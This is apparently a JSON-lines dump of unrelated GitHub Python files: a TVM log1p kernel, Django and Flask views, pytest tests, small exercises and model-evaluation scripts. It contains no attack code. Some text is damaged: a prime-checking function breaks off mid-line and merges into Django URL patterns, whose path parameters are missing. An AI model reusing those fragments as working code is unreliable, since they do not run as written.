(e^y(n) - 1 - x(n))/e^y(n)\n f(y) = e^y(n), y(n) <= TAYLOR_NEGATIVE_THRESHOLD or y(n) >= TAYLOR_POSITIVE_THRESHOLD\n f(y) = seventh taylor computer, TAYLOR_NEGATIVE_THRESHOLD < y(n) < TAYLOR_POSITIVE_THRESHOLD\n\n Parameters\n ----------\n input_x: TVM tensor\n the placeholder of input_x\n output_y: dict\n dict info of output_y\n kernel_name: str\n kernel name, default value is \"log1p\"\n\n Returns\n -------\n res: TVM tensor\n the result of compute\n \"\"\"\n dtype = input_x.dtype\n shape = input_x.shape\n\n cloud_check = tbe_platform.cce_conf.api_check_support(\"te.lang.cce.vlog\",\n \"float32\")\n mini_check = tbe_platform.cce_conf.api_check_support(\"te.lang.cce.vadd\",\n \"float32\")\n\n if dtype == \"float16\" and cloud_check:\n input_x = te.lang.cce.cast_to(input_x, \"float32\")\n\n data_add = te.lang.cce.vadds(input_x, tvm.const(SCALAR_ONE, \"float32\"))\n res = te.lang.cce.vlog(data_add)\n\n if (not cloud_check) and mini_check:\n input_x = te.lang.cce.cast_to(input_x, \"float32\")\n res = _log1p_mini_compute(res, input_x, shape)\n\n if dtype == \"float16\" and (cloud_check or mini_check):\n res = te.lang.cce.cast_to(res, \"float16\")\n\n return res\n\n\ndef _log1p_mini_compute(mini_res, input_x, shape):\n \"\"\"\n do element-wise log(x + 1) compute in mini scene\n f(y) = e^y(n), y(n) <= TAYLOR_NEGATIVE_THRESHOLD or y(n) >= TAYLOR_POSITIVE_THRESHOLD\n f(y) = seventh taylor computer, TAYLOR_NEGATIVE_THRESHOLD < y(n) < TAYLOR_POSITIVE_THRESHOLD\n\n Parameters:\n ----------\n mini_res: TVM tensor, the tensor of log(x + 1)\n input_x : TVM tensor, the placeholder of input_x\n shape : tuple, the shape of input_x\n\n Returns : A Tensor. Has the same type as mini_res.\n -------\n \"\"\"\n input_y = te.lang.cce.cast_to(mini_res, \"float32\")\n input_x = te.lang.cce.cast_to(input_x, \"float32\")\n newton_taylor_res = _newton_taylor_log1p(input_x, input_y)\n newton_exp_res = _newton_exp_log1p(input_x, input_y)\n\n input_left_border = tvm.const(TAYLOR_NEGATIVE_THRESHOLD, \"float32\")\n tensor_input_left_border = te.lang.cce.broadcast(input_left_border, shape)\n\n input_right_border = tvm.const(TAYLOR_POSITIVE_THRESHOLD, \"float32\")\n tensor_input_right_border = te.lang.cce.broadcast(input_right_border,\n shape)\n\n b_gt_left_border = te.lang.cce.vcmp(input_y,\n tensor_input_left_border, 'gt')\n exp_taylor_neg = te.lang.cce.vsel(b_gt_left_border, newton_taylor_res,\n newton_exp_res)\n\n b_lt_right_border = te.lang.cce.vcmp(input_y,\n tensor_input_right_border, 'lt')\n mini_res = te.lang.cce.vsel(b_lt_right_border, exp_taylor_neg,\n newton_exp_res)\n\n return mini_res\n\n\ndef _exp_taylor_compute(input_x):\n \"\"\"\n calculate e^x, use seventh order taylor expansion\n e^x = 1 + x + (x^2 / 2!) + (x^3 / 3!) + (x^4 / 4!) + (x^5 / 5!) + (x^6 / 6!) + (x^7 / 7!)\n\n Parameters:\n ----------\n input_x : TVM tensor, the placeholder of input_x\n\n Returns : A Tensor. Has the same type as input_x.\n -------\n \"\"\"\n # calculate second order tayloy section : x^2 / 2!\n taylor_second_order_param = tvm.const(TAYLOR_SECOND_ORDER_PARAM, \"float32\")\n data_power_2 = te.lang.cce.vmul(input_x, input_x)\n data_power_2_div_2 = te.lang.cce.vmuls(data_power_2,\n taylor_second_order_param)\n\n # calculate third order tayloy section : x^3 / 3!\n taylor_third_order_param = tvm.const(TAYLOR_THIRD_ORDER_PARAM, \"float32\")\n data_power_3 = te.lang.cce.vmul(data_power_2, input_x)\n data_power_3_div_6 = te.lang.cce.vmuls(data_power_3,\n taylor_third_order_param)\n\n # calculate fourth order tayloy section : x^4 / 4!\n taylor_fourth_order_param = tvm.const(TAYLOR_FOURTH_ORDER_PARAM, \"float32\")\n data_power_4 = te.lang.cce.vmul(data_power_3, input_x)\n data_power_4_div_24 = te.lang.cce.vmuls(data_power_4,\n taylor_fourth_order_param)\n\n # calculate fifth order tayloy section : x^5 / 5!\n taylor_fifth_order_param = tvm.const(TAYLOR_FIFTH_ORDER_PARAM, \"float32\")\n data_power_5 = te.lang.cce.vmul(data_power_4, input_x)\n data_power_5_div_120 = te.lang.cce.vmuls(data_power_5,\n taylor_fifth_order_param)\n\n # xcalculate sixth order tayloy section : ^6 / 6!\n taylor_sixth_order_param = tvm.const(TAYLOR_SIXTH_ORDER_PARAM, \"float32\")\n data_power_6 = te.lang.cce.vmul(data_power_5, input_x)\n data_power_6_div_720 = te.lang.cce.vmuls(data_power_6,\n taylor_sixth_order_param)\n\n # calculate seventh order tayloy section : x^7 / 7!\n taylor_seventh_order_param = tvm.const(TAYLOR_SEVENTH_ORDER_PARAM,\n \"float32\")\n data_power_7 = te.lang.cce.vmul(data_power_6, input_x)\n data_power_7_div_5040 = te.lang.cce.vmuls(data_power_7,\n taylor_seventh_order_param)\n\n # calculate first order tayloy plus one section : 1 + x\n res_first_taylor = te.lang.cce.vadds(input_x,\n tvm.const(SCALAR_ONE, \"float32\"))\n res_second_taylor = te.lang.cce.vadd(res_first_taylor, data_power_2_div_2)\n res_third_taylor = te.lang.cce.vadd(res_second_taylor, data_power_3_div_6)\n res_fourth_taylor = te.lang.cce.vadd(res_third_taylor, data_power_4_div_24)\n res_fifth_taylor = te.lang.cce.vadd(res_fourth_taylor, data_power_5_div_120)\n res_sixth_taylor = te.lang.cce.vadd(res_fifth_taylor, data_power_6_div_720)\n res = te.lang.cce.vadd(res_sixth_taylor, data_power_7_div_5040)\n\n return res\n\n\ndef _newton_exp_iter(input_x, input_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n input_y: start value of Newton iteration\n\n Returns : A Tensor. Has the same type as input_y.\n -------\n \"\"\"\n #Newton begin:y(n+1) = y(n) - 1 + e^-y(n) + x(n)*e^-y(n)\n newton_exp = te.lang.cce.vadds(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_mul = te.lang.cce.vmuls(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_exp = te.lang.cce.vexp(input_y_mul)\n newton_exp = te.lang.cce.vadd(newton_exp, input_y_exp)\n input_y_res = te.lang.cce.vmul(input_x, input_y_exp)\n newton_exp = te.lang.cce.vadd(newton_exp, input_y_res)\n #Newton end\n return newton_exp\n\n\ndef _newton_taylor_iter(input_x, input_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n input_y: start value of Newton iteration\n\n Returns: A Tensor. Has the same type as input_y.\n -------\n \"\"\"\n #Newton begin:y(n+1) = y(n) - 1 + e^-y(n) + x(n)*e^-y(n)\n newton_taylor = te.lang.cce.vadds(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_mul = te.lang.cce.vmuls(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_taylor = _exp_taylor_compute(input_y_mul)\n newton_taylor = te.lang.cce.vadd(newton_taylor, input_y_taylor)\n input_y_res = te.lang.cce.vmul(input_x, input_y_taylor)\n newton_taylor = te.lang.cce.vadd(newton_taylor, input_y_res)\n #Newton end\n return newton_taylor\n\n\ndef _newton_exp_log1p(input_x, output_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n output_y: TVM tensor, start value of log1p's Newton iteration\n\n Returns: A Tensor. Has the same type as output_y.\n -------\n \"\"\"\n for _ in range(2):\n output_y = _newton_exp_iter(input_x, output_y)\n return output_y\n\n\ndef _newton_taylor_log1p(input_x, output_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n output_y: TVM tensor, start value of log1p's Newton iteration\n\n Returns: A Tensor. Has the same type as output_y.\n -------\n \"\"\"\n for _ in range(2):\n output_y = _newton_taylor_iter(input_x, output_y)\n return output_y\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_OUTPUT, KERNEL_NAME)\ndef log1p(input_x, output_y, kernel_name=\"log1p\"):\n \"\"\"\n algorithm: log1p\n calculating data's log1p, y = log(x + 1)\n\n Parameters\n ----------\n input_x: dict\n shape and dtype of input, only support float16, float32\n output_y: dict\n shape and dtype of output, should be same shape and type as input\n kernel_name: str\n kernel name, default value is \"log1p\"\n\n Returns\n -------\n None\n \"\"\"\n shape = input_x.get(\"shape\")\n dtype = input_x.get(\"dtype\")\n\n check_shape(shape, param_name=\"input_x\")\n\n check_list = (\"float16\", \"float32\")\n input_dtype = dtype.lower()\n check_dtype(input_dtype, check_list, param_name=\"input_x\")\n\n shape = (functools_reduce(lambda x, y: x*y, shape[:]),)\n data_input = tvm.placeholder(shape, name=\"data_input\", dtype=input_dtype)\n res = log1p_compute(data_input, output_y, kernel_name)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n config = {\"name\": kernel_name,\n \"tensor_list\": [data_input, res],\n \"bool_storage_as_1bit\": False}\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/log1p.py","file_name":"log1p.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72468309608","text":"def asal(n):\r\n p=((n**1/2)//1)\r\n if(n==2):\r\n return(1)\r\n if(n%2==0):\r\n return(0)\r\n i=3\r\n while True:\r\n if(n%i==0 and i!=n):\r\n return(0)\r\n if(i/', AuthorPostAPI.as_view(), name='author_post_api'),\n path('create/', CreatePostAPI.as_view(), name='create_post_api'),\n path('/', SinglePostAPI.as_view(), name='single_post_api'),\n path('/update/', UpdatePostAPI.as_view(), name='update_post_api'),\n path('/delete/', DeletePostAPI.as_view(), name='delete_post_api'),\n path('/comments/', CommentPostAPI.as_view(), name='comments_post_api'),\n]\n","repo_name":"bcaboost/devblog","sub_path":"blogs/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16857480811","text":"from django.http import HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom .models import MacAddressType\nfrom django.views.generic import (\n ListView,\n CreateView,\n UpdateView,\n DetailView,\n DeleteView,\n)\n\nfrom .forms import MacAddressTypeForm\n\n\nclass MacAddressTypeListView(LoginRequiredMixin, ListView):\n model = MacAddressType\n fields = \"__All__\"\n paginate_by = 5\n\n def get_queryset(self, *args, **kwargs):\n query = self.request.GET.get(\"q\")\n if query:\n loockups = (\n Q(code__icontains=query)\n | Q(name__icontains=query)\n | Q(desc__icontains=query)\n )\n qs = MacAddressType.objects.filter(loockups)\n else:\n qs = super(MacAddressTypeListView, self).get_queryset(*args, **kwargs)\n\n return qs.order_by(\"-id\")\n\n def get_template_names(self):\n if self.request.htmx and not self.request.htmx.history_restore_request:\n return \"mac_address_types/partials/macaddresstype_table.html\"\n return \"mac_address_types/macaddresstype_list.html\"\n\n\nclass MacAddressTypeCreateView(SuccessMessageMixin, LoginRequiredMixin, CreateView):\n model = MacAddressType\n form_class = MacAddressTypeForm\n success_message = 'MacAddressType \"%(name)s\" was created successfully'\n\n def get_initial(self):\n initial = super(MacAddressTypeCreateView, self).get_initial()\n initial[\"created_by\"] = self.request.user\n initial[\"updated_by\"] = self.request.user\n return initial\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.created_by = self.request.user\n obj.updated_by = self.request.user\n obj.save()\n return super(MacAddressTypeCreateView, self).form_valid(form)\n\n\nclass MacAddressTypeUpdateView(SuccessMessageMixin, LoginRequiredMixin, UpdateView):\n model = MacAddressType\n success_message = 'MacAddressType \"%(name)s\" was updated successfully'\n\n form_class = MacAddressTypeForm\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.created_by = self.request.user\n obj.updated_by = self.request.user\n obj.save()\n return super(MacAddressTypeUpdateView, self).form_valid(form)\n\n\nclass MacAddressTypeDetailViev(LoginRequiredMixin, DetailView):\n model = MacAddressType\n fields = \"__all__\"\n\n\nclass MacAddressTypeDeleteView(SuccessMessageMixin, LoginRequiredMixin, DeleteView):\n model = MacAddressType\n success_url = reverse_lazy(\"mac_address_types:list\")\n success_message = 'MacAddressType \"%(name)s\" was deleted successfully'\n\n def post(self, request, *args, **kwargs):\n if \"cancel\" in request.POST:\n url = reverse_lazy(\"mac_address_types:list\")\n return HttpResponseRedirect(url)\n else:\n return super(MacAddressTypeDeleteView, self).post(request, *args, **kwargs)\n\n def form_valid(self, request, *args, **kwargs):\n obj = self.get_object()\n messages.success(self.request, self.success_message % obj.__dict__)\n return super(MacAddressTypeDeleteView, self).delete(request, *args, **kwargs)\n","repo_name":"mherreradsci/django42-tutorial-es","sub_path":"mac_address_types/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"552882468","text":"from pytest import fixture, yield_fixture\nfrom mock import MagicMock, patch\n\nfrom hatak.testing import RequestFixture\nfrom ..helpers import has_access_to_route, ConventWidget\n\n\nclass TestHasAccessToRoute(object):\n\n def test_success(self):\n \"\"\"\n has_access_to_route should run decorated method if use has access to\n route.\n \"\"\"\n method = MagicMock()\n decorator = has_access_to_route('route')\n wrapped = decorator(method)\n obj = MagicMock()\n obj.user.has_access_to_route.return_value = True\n\n result = wrapped(obj, 'arg', kw='kwarg')\n\n method.assert_called_once_with(obj, 'arg', kw='kwarg')\n assert result == method.return_value\n obj.user.has_access_to_route.assert_called_once_with('route')\n\n def test_fail(self):\n \"\"\"\n has_access_to_route should return '' if use has no access to\n route\n \"\"\"\n method = MagicMock()\n decorator = has_access_to_route('route')\n wrapped = decorator(method)\n obj = MagicMock()\n obj.user.has_access_to_route.return_value = False\n\n result = wrapped(obj, 'arg', kw='kwarg')\n\n assert result == ''\n obj.user.has_access_to_route.assert_called_once_with('route')\n\n\nclass TestConventWidget(RequestFixture):\n\n @fixture\n def convent(self):\n return MagicMock()\n\n @fixture\n def widget(self, request, convent):\n return ConventWidget(request, convent)\n\n @yield_fixture\n def render_for(self, widget):\n with patch.object(widget, 'render_for', autospec=True) as mock:\n yield mock\n\n @yield_fixture\n def ConventDeleteForm(self):\n patcher = patch('konwentor.convent.helpers.ConventDeleteForm')\n with patcher as mock:\n yield mock\n\n @yield_fixture\n def FormWidget(self):\n patcher = patch('konwentor.convent.helpers.FormWidget')\n with patcher as mock:\n yield mock\n\n def test_id(self, widget, convent):\n assert widget.id == convent.id\n\n def test_name(self, widget, convent):\n assert widget.name == convent.name\n\n def test_state(self, convent, widget):\n convent.state = 'running'\n assert widget.state == 'W trakcie'\n\n def test_switch(self, convent, widget, render_for):\n result = widget.switch()\n render_for.assert_called_once_with(\n 'choose_button.jinja2',\n {\n 'url': self.route('convent:choose', obj_id=convent.id)\n }\n )\n assert result == render_for.return_value\n\n def test_edit(self, widget, convent, render_for):\n result = widget.edit()\n render_for.assert_called_once_with(\n 'edit_button.jinja2',\n {\n 'url': self.route('convent:edit', obj_id=convent.id)\n }\n )\n assert result == render_for.return_value\n\n def test_delete(\n self,\n widget,\n convent,\n render_for,\n ConventDeleteForm,\n FormWidget,\n request\n ):\n route = request.route_path\n result = widget.delete()\n\n render_for.assert_called_once_with(\n 'delete_button.jinja2',\n {\n 'url': route('convent:delete', obj_id=convent.id),\n 'form': FormWidget.return_value,\n }\n )\n form = ConventDeleteForm.return_value\n\n assert result == render_for.return_value\n FormWidget.assert_called_once_with(self.request, form)\n ConventDeleteForm.assert_called_once_with(self.request)\n assert route('convent:delete', obj_id=convent.id) == form.action\n\n def test_start_fail(\n self,\n widget,\n convent,\n render_for,\n ):\n convent.is_user_able_to_start.return_value = False\n assert widget.start() == ''\n convent.is_user_able_to_start.assert_called_once_with(\n widget.user)\n\n def test_start_success(self, widget, convent, render_for):\n convent.is_user_able_to_start.return_value = True\n\n result = widget.start()\n\n convent.is_user_able_to_start.assert_called_once_with(\n widget.user)\n\n render_for.assert_called_once_with(\n 'start_button.jinja2',\n {\n 'url': self.route('convent:start', obj_id=convent.id),\n 'convent': widget.convent,\n }\n )\n assert result == render_for.return_value\n\n def test_end_fail(self, widget, convent):\n convent.is_user_able_to_end.return_value = False\n assert widget.end() == ''\n convent.is_user_able_to_end.assert_called_once_with(\n widget.user)\n\n def test_end_success(self, widget, convent, render_for):\n convent.is_user_able_to_end.return_value = True\n\n result = widget.end()\n\n convent.is_user_able_to_end.assert_called_once_with(\n widget.user)\n\n render_for.assert_called_once_with(\n 'end_button.jinja2',\n {\n 'url': self.route('convent:end', obj_id=convent.id),\n }\n )\n assert result == render_for.return_value\n\n def test_ended_warning_false(self, widget, convent):\n convent.state = 'running'\n\n result = widget.ended_warning()\n\n assert result == ''\n\n def test_ended_warning_true(self, widget, convent, render_for):\n convent.state = 'ended'\n\n result = widget.ended_warning()\n\n render_for.assert_called_once_with(\n 'ended_warning.jinja2',\n {}\n )\n assert result == render_for.return_value\n\n def test_row_class_false(self, widget, convent):\n convent.id = 10\n assert widget.row_class(15) == ''\n\n def test_row_class_true(self, widget, convent):\n convent.id = 10\n assert widget.row_class(10) == 'danger'\n","repo_name":"socek/konwentor","sub_path":"code/src/konwentor/convent/tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8794932073","text":"from flask import render_template,redirect,session,request, flash\r\nfrom flask_app import app\r\nfrom flask_app.models.game_review import Reviews\r\nfrom flask_app.models.game import Games\r\nfrom flask_app.models.user import User\r\n\r\n\r\n@app.route('/new/review/')\r\ndef new_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"id\":id,\r\n }\r\n user_data={\r\n \"id\":session[\"user_id\"]\r\n }\r\n return render_template('new_review.html',user=User.get_by_id(user_data),game=Games.get_one(data))\r\n\r\n\r\n@app.route('/create/review',methods=['POST'])\r\ndef create_review():\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n if not Reviews.validate_review(request.form):\r\n return redirect('/new/Review')\r\n data = {\r\n \"review\": request.form[\"review\"],\r\n \"score\": int(request.form[\"score\"]),\r\n \"user_id\": session[\"user_id\"],\r\n \"game_id\": request.form[\"game_id\"]\r\n }\r\n Reviews.save(data)\r\n return redirect('/dashboard')\r\n\r\n@app.route('/edit/review/')\r\ndef edit_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"id\":id\r\n }\r\n user_data = {\r\n \"id\":session['user_id']\r\n }\r\n return render_template(\"edit_review.html\",review=Reviews.get_one_review(data),user=User.get_by_id(user_data))\r\n\r\n@app.route('/update/review',methods=['POST'])\r\ndef update_review():\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n if not Reviews.validate_review(request.form):\r\n return redirect('/new/review')\r\n data = {\r\n \"review\": request.form[\"review\"],\r\n \"score\": int(request.form[\"score\"]),\r\n \"user_id\": session[\"user_id\"],\r\n \"game_id\": request.form[\"game_id\"],\r\n # \"id\": request.form[\"game_id\"]\r\n }\r\n id=Reviews.update(data)\r\n return redirect('/dashboard')\r\n\r\n@app.route('/review/')\r\ndef show_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"game_id\":id\r\n }\r\n user_data = {\r\n \"id\":session['user_id']\r\n }\r\n Reviews.get_all_reviews\r\n return render_template(\"show_reviews.html\",reviews=Reviews.get_all_reviews_with_users(data),user=User.get_by_id(user_data))\r\n\r\n@app.route('/destroy/review/')\r\ndef destroy_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"id\":id\r\n }\r\n Reviews.destroy(data)\r\n return redirect('/dashboard')","repo_name":"kashley90/GameReviewProject","sub_path":"GoodOrNotGames!/flask_app/controllers/game_reviews.py","file_name":"game_reviews.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73953984489","text":"\nfrom treeNode import TreeNode\n\n\ntreeNode = TreeNode(3)\ntreeNode.left = TreeNode(9)\ntreeNode.right = TreeNode(20)\ntreeNode.right.left = TreeNode(15)\ntreeNode.right.right = TreeNode(7)\n\n\nfrom collections import deque\n\n# O(n) || O(d)\ndef zigZagLevelOrder(root):\n if not root:\n return root\n\n result = []\n queue = deque([root])\n depth = 0\n while queue:\n newLevel = []\n for _ in range(len(queue)):\n currNode = queue.popleft()\n newLevel.append(currNode.value)\n if currNode.left:\n queue.append(currNode.left)\n if currNode.right:\n queue.append(currNode.right)\n\n result += [newLevel] if depth % 2 == 0 else [newLevel[::-1]]\n depth += 1\n\n return result\n\nprint(zigZagLevelOrder(treeNode))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/tree/BinaryTreeZigzagLevelOrderTraversal.py","file_name":"BinaryTreeZigzagLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36953316864","text":"with open('./answers.txt') as file:\r\n my_input = file\r\n data=file.readlines()\r\n file.close()\r\n \r\ndata = [x.replace('\\n',\"\") for x in data]\r\n\r\ncounter = 0\r\nclean_data=[]\r\nentry = ''\r\nfor i in range(len(data)):\r\n entry = entry+data[i]\r\n if data[i]=='' or counter== len(data)-1:\r\n clean_data.append(entry)\r\n entry = ''\r\n counter+=1\r\n\r\n##puzzle in a one liner##\r\ntotal = sum([len(set(answers)) for answers in clean_data])\r\nprint(total)","repo_name":"gustojvalle/AdventOfCode2020","sub_path":"AdventOfCode6.1.py","file_name":"AdventOfCode6.1.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"656329107","text":"from math import dist\nimport pickle\nfrom statistics import mean\nfrom classes.data import get_training_data, get_verification_data\nfrom classes.xlsxReader import read_data_from_file\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.neural_network import MLPRegressor\nimport matplotlib.pyplot as plt\nimport os\nfrom prettytable import PrettyTable\nfrom openpyxl import Workbook\nimport json\n\n\nOUTPUT_DIR = \"output\"\n\nif not os.path.exists(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n\n\nwith open(\"model.pkl\", \"rb\") as f:\n clf: MLPRegressor = pickle.load(f)\n\n\ndata = read_data_from_file(\"data.pkl\")\n\nstatic_train, static_target = get_training_data(data)\nstatic_read = []\nfor i in range(len(static_train)):\n l = len(static_train[i])\n static_read.append([static_train[i][l-3], static_train[i][l-2]])\nstatic_predicts = clf.predict(static_train)\n\ndynamic_train, dynamic_target = get_verification_data(data)\ndynamic_read = []\nfor i in range(len(dynamic_train)):\n l = len(dynamic_train[i])\n dynamic_read.append([dynamic_train[i][l-3], dynamic_train[i][l-2]])\ndynamic_predicts = clf.predict(dynamic_train)\n\n\ndef stats(train, target):\n\n r2_score = metrics.r2_score(target, train)\n mean_absolute_error = metrics.mean_absolute_error(target, train)\n mean_squared_error = metrics.mean_squared_error(target, train)\n median_absolute_error = metrics.median_absolute_error(target, train)\n mean_absolute_percentage_error = metrics.mean_absolute_percentage_error(\n target, train)\n avg_dist = mean(calc_distances(train, target))\n\n return \\\n f\"{round(r2_score*100, 2)}%\", \\\n round(mean_absolute_error, 2), \\\n round(mean_squared_error, 2), \\\n round(median_absolute_error, 2), \\\n f\"{round(mean_absolute_percentage_error*100, 2)}%\", \\\n round(avg_dist, 2)\n\n\ndef calc_distances(train, target):\n distances = []\n for i in range(len(train)):\n distances.append(dist(train[i], target[i]))\n return distances\n\n\ntable = PrettyTable([\"dane\", \"r2_score\", \"mean_absolute_error\", \"mean_squared_error\",\n \"median_absolute_error\", \"mean_absolute_percentage_error\", \"avg_dist\"])\ntable.add_row([\"static_read\", *stats(static_read, static_target)])\ntable.add_row([\"static_predict\", *stats(static_predicts, static_target)])\ntable.add_row([\"dynamic_read\", *stats(dynamic_read, dynamic_target)])\ntable.add_row([\"dynamic_predict\", *stats(dynamic_predicts, dynamic_target)])\n\nprint(table)\n\n\n# rotate all data 90 degrees\ndynamic_read_rotated = np.rot90(dynamic_read)\ndynamic_predicts_rotated = np.rot90(dynamic_predicts)\ndynamic_target_rotated = np.rot90(dynamic_target)\n\nstatic_read_rotated = np.rot90(static_read)\nstatic_predicts_rotated = np.rot90(static_predicts)\nstatic_target_rotated = np.rot90(static_target)\n\nplt.title(\"Dynamic\")\nplt.scatter(\n dynamic_read_rotated[0], dynamic_read_rotated[1], c='blue', label='read', s=1)\nplt.scatter(dynamic_predicts_rotated[0], dynamic_predicts_rotated[1],\n c='red', label='predicted', s=1)\nplt.scatter(dynamic_target_rotated[0], dynamic_target_rotated[1],\n c='green', label='target', s=1)\n\nplt.legend()\nplt.ylabel(\"y\", loc='top')\nplt.xlabel(\"x\", loc='right')\n\nplt.savefig(OUTPUT_DIR + \"/dynamic.png\")\n\nplt.clf()\n\n\nplt.title(\"Static\")\nplt.scatter(static_predicts_rotated[0], static_predicts_rotated[1],\n c='red', label='predicted', s=1)\nplt.scatter(\n static_read_rotated[0], static_read_rotated[1], c='blue', label='read', s=1)\nplt.scatter(static_target_rotated[0], static_target_rotated[1],\n c='green', label='target', s=1)\n\nplt.legend()\nplt.ylabel(\"y\", loc='top')\nplt.xlabel(\"x\", loc='right')\n\nplt.savefig(OUTPUT_DIR + \"/static.png\")\n\n\n# zapis średnich odległości do xls\nbook = Workbook()\nsheet = book.active\ndistances = calc_distances(dynamic_predicts, dynamic_target)\nfor distance in distances:\n sheet.append([distance])\nbook.save(OUTPUT_DIR + \"/error_distribution.xlsx\")\n\n\n# zapis wag do json\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\nwith open(OUTPUT_DIR + \"/weights.json\", \"w\") as f:\n json.dump(clf.coefs_, f, ensure_ascii=False, indent=2, cls=NumpyEncoder)\n","repo_name":"XDesu/SISE_zad2_neurony","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41268641659","text":"class Payslips:\r\n def __init__(self, name, payment, amount) -> None:\r\n self.name = name\r\n self.payment = payment\r\n self.amount = amount\r\n\r\n def pay(self):\r\n self.payment = \"yes\"\r\n\r\n def status(self):\r\n if self.payment == \"yes\":\r\n return self.name + \" is paid \" + str(self.amount)\r\n else:\r\n return self.name + \"is not paid yet\"\r\n \r\nnathan = Payslips(\"Nathan\", \"no\", 1000)\r\nroger = Payslips(\"Roger\", \"no\", 3000)\r\n\r\nprint(nathan.status(), \"\\n\", roger.status())\r\nnathan.pay()\r\nprint(\"After payment\")\r\nprint(nathan.status(), \"\\n\", roger.status())","repo_name":"FelicityTech/Meta-Back-End_Dev","sub_path":"Python/OOP/payment_slip.py","file_name":"payment_slip.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44572809005","text":"import warnings\nimport cv2\nimport os.path\nimport glob\nimport json\nimport numpy as np\nimport torch\nfrom PIL import Image\n\nVOC_CATEGORY_NAMES = ['background',\n 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle',\n 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person',\n 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\nNYU_CATEGORY_NAMES = ['wall', 'floor', 'cabinet', 'bed', 'chair',\n 'sofa', 'table', 'door', 'window', 'bookshelf',\n 'picture', 'counter', 'blinds', 'desk', 'shelves',\n 'curtain', 'dresser', 'pillow', 'mirror', 'floor mat',\n 'clothes', 'ceiling', 'books', 'refridgerator', 'television',\n 'paper', 'towel', 'shower curtain', 'box', 'whiteboard',\n 'person', 'night stand', 'toilet', 'sink', 'lamp',\n 'bathtub', 'bag', 'otherstructure', 'otherfurniture', 'otherprop']\n\n\ndef eval_semseg(loader, folder, n_classes=20, has_bg=True):\n\n n_classes = n_classes + int(has_bg)\n\n # Iterate\n tp = [0] * n_classes\n fp = [0] * n_classes\n fn = [0] * n_classes\n\n for i, sample in enumerate(loader):\n\n if i % 500 == 0:\n print('Evaluating: {} of {} objects'.format(i, len(loader)))\n\n # Load result\n filename = os.path.join(folder, sample['meta']['image'] + '.png')\n mask = np.array(Image.open(filename)).astype(np.float32)\n\n gt = sample['semseg']\n valid = (gt != 255)\n\n if mask.shape != gt.shape:\n warnings.warn('Prediction and ground truth have different size. Resizing Prediction..')\n mask = cv2.resize(mask, gt.shape[::-1], interpolation=cv2.INTER_NEAREST)\n\n # TP, FP, and FN evaluation\n for i_part in range(0, n_classes):\n tmp_gt = (gt 